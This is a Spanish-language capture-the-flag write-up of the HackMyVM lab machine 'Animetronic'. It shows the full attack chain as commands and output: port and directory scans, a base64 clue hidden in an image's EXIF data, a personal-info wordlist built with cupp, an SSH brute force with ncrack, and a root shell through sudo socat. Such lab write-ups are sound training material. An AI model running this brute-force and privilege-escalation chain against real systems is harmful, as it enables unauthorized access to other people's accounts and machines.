cd ~/blog

~/writeups/hmv/039-animetronic.md

039 - Animetronic

easy Linux hmv 08-03-2024
Steganography / EXIF disclosureTargeted wordlist (cupp) + SSH brute forcesudo socat Privesc
hackmyvm.eu/machines/machine.php?vm=Animetronic

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.35
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.35
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-08 14:32 -03
Nmap scan report for 192.168.1.35
Host is up (0.00028s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 59:eb:51:67:e5:6a:9e:c1:4c:4e:c5:da:cd:ab:4c:eb (ECDSA)
|_  256 96:da:61:17:e2:23:ca:70:19:b5:3f:53:b5:5a:02:59 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Animetronic
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds

Enumeramos directorios con ffuf (anidados):

 ffuf -u 'http://192.168.1.35/FUZZ' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
...
img                     [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 440ms]
staffpages              [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 12ms]
...

 ffuf -u 'http://192.168.1.35/staffpages/FUZZ' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
...
new_employees           [Status: 200, Size: 159577, Words: 682, Lines: 728, Duration: 17ms]
...

new_employees es una imagen JPG cuyo comentario EXIF contiene una cadena codificada:

 exiftool new_employees.jpg
...
Comment                         : page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=
...

 echo "ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=" | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן

El texto (invertido) apunta a message_for_michael. Lo visitamos y encontramos una nota que menciona un archivo de información personal:

Hi Michael

Sorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.

By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file

personal_info.txt

 curl http://192.168.1.35/staffpages/personal_info.txt
name: Michael
age: 27
birth date: 19/10/1996
number of children: 3 " Ahmed - Yasser - Adam "
Hobbies: swimming

Generamos un diccionario personalizado con cupp a partir de esos datos:

 sudo cupp -i
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]

[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: michael
> Surname:
> Nickname:
> Birthdate (DDMMYYYY): 19101996

> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):

> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):

> Pet's name:
> Company name:

> Do you want to add some key words about the victim? Y/[N]: Y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: swimming,ahmed,yasser,adam
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 2516 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with michael.txt and shoot! Good luck!

Hacemos fuerza bruta contra SSH con ncrack:

 ncrack -v --user michael -P michael.txt 192.168.1.35:22

Starting Ncrack 0.7 ( http://ncrack.org ) at 2024-03-09 14:52 -03

Discovered credentials on ssh://192.168.1.35:22 'michael' 'leahcim1996'
ssh://192.168.1.35:22 finished.

Discovered credentials for ssh on 192.168.1.35 22/tcp:
192.168.1.35 22/tcp ssh: 'michael' 'leahcim1996'

Ncrack done: 1 service scanned in 447.00 seconds.
Probes sent: 651 | timed-out: 0 | prematurely-closed: 224

Ncrack finished.

Iniciamos sesión como michael y, en el home de henry, hallamos la primera flag y una nota que apunta (en base64) al archivo con su contraseña:

michael@animetronic:/home/henry$ cat Note.txt
if you need my account to do anything on the server,
you will find my password in file named

aGVucnlwYXNzd29yZC50eHQK
 echo "aGVucnlwYXNzd29yZC50eHQK" | base64 -d
henrypassword.txt

michael@animetronic:/home/henry$ find / -name henrypassword.txt 2>/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt

Con esa contraseña iniciamos sesión como henry y revisamos sudo -l:

henry@animetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User henry may run the following commands on animetronic:
    (root) NOPASSWD: /usr/bin/socat

Podemos ejecutar socat como root, lo que aprovechamos para obtener una shell privilegiada:

henry@animetronic:~$ sudo socat stdin exec:/bin/bash
whoami
root

Obtenemos nuestra bandera.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados